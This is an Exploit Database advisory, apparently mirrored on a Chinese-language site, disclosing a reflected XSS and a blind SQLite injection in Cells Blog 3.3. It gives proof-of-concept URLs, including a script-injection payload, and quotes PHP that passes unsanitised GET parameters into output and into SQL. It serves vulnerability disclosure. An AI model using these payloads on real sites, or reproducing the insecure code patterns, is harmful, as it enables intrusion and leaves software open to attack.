Cells Blog 3.3 – Reflected Cross-Site Scripting / Blind SQLite Injection

• Exploit Database
• 124 阅读

• 作者： vinicius777
  日期： 2014-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31146/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  ################################################################ [+] Exploit: Cells v3.3 XSS Reflected & Blind SQLite Injection # [+] Author: vinicius777 # [+] Contact: vinicius777 [AT] gmail @vinicius777_# [+] version: Cells Blog 3.3 # [+] Vendor Homepage: http://cells.tw # ################################################################   [+] 14/01/2014 vendor contacted [+] 17/01/2014 no response from vendor [+] 20/01/2014 no response from vendor [+] 21/01/2014 Published   [1] Reflective XSS on &apos;msg=&apos;   PoC: http://localhost/cells-v3-3/errmsg.php?msg= [%3C%2Fp%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cp%3E]     Vulnerable Code: [+] errmsg.php   <? echo "<img src=&apos;https://www.exploit-db.com/exploits/31146/images/error.gif&apos;>"; if (isset($_GET["msg"])){$msg=$_GET["msg"];}else{$msg="";} if ($msg!=""){ echo "<br><br><br>".$msg; }else{ echo "<br><br><br>You may key in something wrong.<br>Please try it again! ..... "; echo " If you always got this message, <br>please send a <a href=&apos;https://www.exploit-db.com/exploits/31146/pub_pubmsg.php?bgid=1&apos;>".$face_report."</a>"; echo " to the web master."; } ?>   [2] Blind SQLite Injection on &apos;pcid&apos;   PoC: http://localhost/cells-v3-3/user.php?pcid= [SQLite Injection]   Vulnerable Code: [+] user.php   if($_GET["pcid"]!=""){ $sql="select * from users where cdt=&apos;n&apos; and pcid=".$_GET["pcid"];     # # # Greetz to g0tm1lk and TheColonial.